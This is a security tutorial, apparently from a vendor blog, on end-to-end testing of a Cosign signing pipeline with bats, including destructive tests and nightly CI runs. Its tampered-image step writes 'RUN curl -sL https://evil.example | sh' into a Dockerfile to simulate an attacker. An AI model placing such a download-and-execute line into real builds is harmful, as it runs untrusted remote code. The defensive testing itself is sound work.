DevSecOps

How to Test Your Signing Pipeline End to End

Build a repeatable end-to-end test harness for your signing pipeline that proves artifacts are signed correctly and that verification fails when an artifact has been tampered with.

Shadab Khan
Security Engineer
6 min read

A signing pipeline that has never been tested in anger is a signing pipeline that will fail the first time you need it. Most teams test that sign succeeds, which is necessary but not sufficient. The real test is whether verification fails when an artifact is tampered with or when a signature is missing. This tutorial walks through a test harness that exercises your Cosign-based pipeline across five scenarios: valid signature, missing signature, tampered digest, wrong identity, and expired certificate. You will finish with a reusable script that runs nightly and alerts when any scenario behaves unexpectedly.

Prerequisites: cosign 2.2.0+, access to your CI system, a container registry, and bats 1.10+ for structured test output. Time to complete: About 2 hours.

Why test verification failures and not just sign success?

Verification has two failure modes: false positive and false negative. A false positive is "verification passes on an artifact that should have been rejected." A false negative is "verification fails on an artifact that should have been accepted." False positives are security incidents; false negatives are reliability incidents. Both are bad, but false positives are what allow compromised artifacts to reach production, so they are what your test harness must catch.

The industry term for this is "destructive testing": deliberately produce an artifact that violates the policy and confirm that verification rejects it. If your pipeline never sees a violating artifact, your verification code has never actually been exercised, and you cannot claim confidence in it.
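The contract of a destructive test can be captured in a few lines of shell. This helper (the name expect_failure is mine, not a cosign or bats construct) inverts a command's exit status so that rejection counts as success:

```shell
#!/usr/bin/env bash
# expect_failure: run a command and succeed only if it fails.
# A destructive test passes when verification rejects the artifact.
expect_failure() {
  if "$@"; then
    echo "DESTRUCTIVE TEST FAILED: '$*' succeeded but should have been rejected" >&2
    return 1
  fi
  echo "ok: '$*' was rejected as expected"
}

# 'false' stands in here for a cosign verify call that must fail
expect_failure false
```

The bats assertions in the next section express the same inversion with [ "${status}" -ne 0 ].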

How do I structure the test harness?

Organize the harness as a set of bash test cases under bats, one per scenario. Each case builds a test artifact, runs the pipeline step under test, and asserts the expected outcome:

# signing_pipeline.bats
setup() {
  export TEST_IMG="ghcr.io/acme/sig-test:${BATS_TEST_NAME}"
  export IDENTITY_REGEX="^https://github.com/acme/.+/release.yml@refs/tags/.*$"
  export ISSUER="https://token.actions.githubusercontent.com"
}

@test "valid signature verifies" {
  run cosign verify "${TEST_IMG}" \
    --certificate-identity-regexp "${IDENTITY_REGEX}" \
    --certificate-oidc-issuer "${ISSUER}"
  [ "${status}" -eq 0 ]
}

@test "missing signature fails verification" {
  run cosign verify "${TEST_IMG}-unsigned" \
    --certificate-identity-regexp "${IDENTITY_REGEX}" \
    --certificate-oidc-issuer "${ISSUER}"
  [ "${status}" -ne 0 ]
  [[ "${output}" == *"no matching signatures"* ]]
}

Run with bats signing_pipeline.bats. Each test emits ok or not ok with a test number in TAP format, which is a clean stream for CI to ingest.
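If a CI step needs a hard pass/fail signal from the TAP stream, a small filter over bats' output is enough. A sketch, with a helper name of my own (tap_failures):

```shell
#!/usr/bin/env bash
# tap_failures: count failing tests in a TAP stream (lines beginning "not ok").
tap_failures() {
  grep -c '^not ok' || true
}

# In CI you would pipe the real run:  bats signing_pipeline.bats | tee tap.log
# Here a sample TAP stream stands in for it:
printf 'ok 1 valid signature verifies\nnot ok 2 missing signature fails verification\n' \
  | tap_failures   # prints 1
```

Gate the step with [ "$(tap_failures < tap.log)" -eq 0 ] to fail the build on any rejected scenario.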

How do I produce a tampered artifact for negative tests?

Build two images that differ only in content, sign the first, and then swap the signature onto the second. The goal is to simulate what an attacker would do if they compromised the registry:

# Build and sign the "good" image (keyless: run in CI with an OIDC token
# available, or complete the interactive flow locally)
docker build -t ghcr.io/acme/sig-test:good .
GOOD_DIGEST=$(docker push ghcr.io/acme/sig-test:good 2>&1 | grep -oP 'digest: \Ksha256:[a-f0-9]+')
cosign sign -y "ghcr.io/acme/sig-test@${GOOD_DIGEST}"

# Build a malicious image
echo "RUN curl -sL https://evil.example | sh" >> Dockerfile
docker build -t ghcr.io/acme/sig-test:tampered .
TAMPERED_DIGEST=$(docker push ghcr.io/acme/sig-test:tampered 2>&1 | grep -oP 'digest: \Ksha256:[a-f0-9]+')

# Swap: retag the good image's signature onto the location where cosign
# will look for the tampered digest's signature (requires crane from
# go-containerregistry; cosign stores signatures at sha256-<hex>.sig)
crane tag "ghcr.io/acme/sig-test:sha256-${GOOD_DIGEST#sha256:}.sig" \
  "sha256-${TAMPERED_DIGEST#sha256:}.sig"

# Attempt verification of the tampered image with the swapped signature
cosign verify "ghcr.io/acme/sig-test@${TAMPERED_DIGEST}" \
  --certificate-identity-regexp "${IDENTITY_REGEX}" \
  --certificate-oidc-issuer "${ISSUER}"

Expected output:

Error: no matching signatures:
signature digest did not match image digest

The digest mismatch is what Cosign is designed to catch, and it is exactly what your harness must confirm.
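When a swap does not behave the way you expect, check where Cosign actually looks for the signature. The location is derived from the subject digest, and cosign triangulate prints it directly; the digest value below is a placeholder for illustration:

```shell
#!/usr/bin/env bash
# Cosign stores the signature at a tag derived from the subject digest:
# sha256-<hex>.sig in the same repository. Derive that tag in shell:
TAMPERED_DIGEST="sha256:0123abcd"   # placeholder; use the real pushed digest
SIG_TAG="sha256-${TAMPERED_DIGEST#sha256:}.sig"
echo "ghcr.io/acme/sig-test:${SIG_TAG}"   # prints ghcr.io/acme/sig-test:sha256-0123abcd.sig

# cosign resolves the same location for you (requires registry access):
#   cosign triangulate "ghcr.io/acme/sig-test@${TAMPERED_DIGEST}"
```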

How do I test the wrong-identity scenario?

Sign an image from a workflow that does not match your identity policy and verify that policy rejects it. This exercises the keyless identity check, which is often where misconfiguration hides:

# In a test-only workflow file .github/workflows/negative-sig-test.yml
# triggered manually, not on tag
on: workflow_dispatch
jobs:
  negative-sign:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      packages: write
    steps:
      - uses: docker/login-action@v3
        with:
          registry: ghcr.io
          username: ${{ github.actor }}
          password: ${{ secrets.GITHUB_TOKEN }}
      - uses: sigstore/cosign-installer@v3.4.0
      - run: |
          cosign sign -y ghcr.io/acme/sig-test:wrong-identity

After running that workflow, test verification against the production identity regex:

cosign verify ghcr.io/acme/sig-test:wrong-identity \
  --certificate-identity-regexp "^https://github.com/acme/.+/release.yml@refs/tags/.*$" \
  --certificate-oidc-issuer https://token.actions.githubusercontent.com

Expected failure:

Error: no matching signatures:
none of the expected identities matched what was in the certificate, got subjects: [https://github.com/acme/app/.github/workflows/negative-sig-test.yml@refs/heads/main]

That error is gold. It proves your identity policy is narrower than the set of workflows that can produce signatures, which is what you want.
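To see which identity a certificate actually carried, parse the JSON that cosign verify prints on success: keyless entries include Subject and Issuer under the optional fields. The payload below is a trimmed, hypothetical sample in that shape, so the extraction can be shown without a live registry:

```shell
#!/usr/bin/env bash
# Trimmed, hypothetical sample of cosign verify's JSON output
VERIFY_JSON='[{"critical":{"identity":{"docker-reference":"ghcr.io/acme/sig-test"}},"optional":{"Issuer":"https://token.actions.githubusercontent.com","Subject":"https://github.com/acme/app/.github/workflows/negative-sig-test.yml@refs/heads/main"}}]'

# Pull out the signing identity; jq is nicer if you have it:
#   cosign verify IMAGE ... | jq -r '.[].optional.Subject'
printf '%s' "${VERIFY_JSON}" | grep -o '"Subject":"[^"]*"' | cut -d'"' -f4
```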

How do I test certificate expiration?

Fulcio issues short-lived certificates, typically valid for 10 minutes. You cannot easily fake expiration, but you can keep a signature made months ago and demonstrate that verification still succeeds. Cosign attaches the Rekor bundle to the signature at signing time, so cosign verify --offline can check the transparency-log evidence without contacting Rekor:

# Sign keyless so Fulcio issues a short-lived certificate and the Rekor
# bundle is stored alongside the signature in the registry
cosign sign -y ghcr.io/acme/sig-test:old
# Weeks later, long after the certificate's ten-minute validity window:
cosign verify --offline ghcr.io/acme/sig-test:old \
  --certificate-identity-regexp "${IDENTITY_REGEX}" \
  --certificate-oidc-issuer "${ISSUER}"

The test passes because the Rekor bundle's signed timestamp proves the signature was created while the certificate was still valid, even though the leaf certificate has since expired. This is an important property to exercise: without it, any long-lived release would become unverifiable.

How do I run this nightly and alert on failures?

Add a scheduled workflow that runs the whole bats suite against a dedicated test registry path:

name: Nightly Signing Harness
on:
  schedule:
    - cron: '0 6 * * *'
  workflow_dispatch:
jobs:
  harness:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      packages: write
    steps:
      - uses: actions/checkout@v4
      - uses: sigstore/cosign-installer@v3.4.0
      - name: Install bats
        run: |
          # apt's bats predates the 1.10 prerequisite; install a pinned release
          git clone --depth 1 --branch v1.10.0 https://github.com/bats-core/bats-core.git
          sudo ./bats-core/install.sh /usr/local
      - name: Run harness
        run: bats tests/signing_pipeline.bats
      - name: Alert on failure
        if: failure()
        uses: slackapi/slack-github-action@v1.26.0
        with:
          slack-message: "Signing harness FAILED on ${{ github.ref }}"
          channel-id: C012345
        env:
          SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }}

The nightly schedule catches drift: a new Cosign release that changes verification behavior, a KMS key policy change that silently broke signing, or a CA bundle rotation that your airgap cluster missed. The harness is cheap to run and pays for itself the first time it catches one of these.

What should I keep in the harness as it grows?

Add one scenario per class of bug you find in production. If a customer reports that a verification worked when it should have failed, write a harness test that reproduces the situation and keep it forever. The harness becomes the living documentation of what your signing pipeline actually does, as opposed to what you think it does. Five good tests are better than fifty that all exercise the same happy path.
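One way to make that habit mechanical is to scaffold each regression as its own bats file named after the incident. The incident ID and file layout here are illustrative, not a convention from the harness above:

```shell
#!/usr/bin/env bash
# Scaffold a destructive regression test from an incident reference.
INCIDENT="INC-1234"   # hypothetical incident ID
mkdir -p tests
cat > "tests/regression_${INCIDENT}.bats" <<'EOF'
@test "regression: artifact shape from the incident must fail verification" {
  run cosign verify "${TEST_IMG}-regression" \
    --certificate-identity-regexp "${IDENTITY_REGEX}" \
    --certificate-oidc-issuer "${ISSUER}"
  [ "${status}" -ne 0 ]
}
EOF
echo "wrote tests/regression_${INCIDENT}.bats"
```

Fill in the reproduction for the cosign verify call, commit the file, and the nightly run keeps the incident from regressing silently.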

How Safeguard Helps

Safeguard runs signing-pipeline health checks continuously across every product in your tenant, not just on a nightly cron. Griffin AI correlates signing failures with the underlying change (a workflow file edit, a KMS policy change, a CA rotation) so the alert arrives with a plausible cause attached. SBOMs for each release carry attestation status alongside component data, which means a missing signature is as visible as a missing component. Policy gates block the release of any artifact that fails the harness criteria, making the test suite part of the deploy path rather than a separate nightly job that sometimes nobody watches.
